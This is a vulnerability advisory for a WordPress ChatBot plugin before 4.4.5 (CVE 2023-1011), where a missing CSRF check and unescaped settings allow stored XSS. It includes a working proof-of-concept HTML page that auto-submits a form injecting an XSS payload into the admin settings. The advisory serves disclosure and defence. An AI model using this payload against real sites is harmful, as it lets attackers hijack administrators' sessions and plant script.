ChatBot < 4.4.5 – Stored XSS via CSRF | CVE 2023-1011

Description

The plugin does not escape most of its settings before outputting them back in the dashboard, and does not have a proper CSRF check, allowing attackers to make a logged in admin set XSS payloads in them.

Note: v4.4.5 fixed the CSRF issue, the lack of escaping was fixed in 4.5.1 and a separate issue was created for it

Proof of Concept

Make a logged in admin open a page with the following HTML code

<html>
  <body onload="document.forms[0].submit()">
    <form action="http://example.com/wp-admin/admin.php?page=wpbot&tab=general" method="POST">
        <input type="hidden" name="_wpnonce" value="1"/>
        <input type="hidden" name="qlcd_wp_chatbot_host" value='" style=animation-name:rotation onanimationstart=alert(/XSS/)//' />
        <input type="submit" name="submit" value="Submit" />
    </form>
  </body>
</html>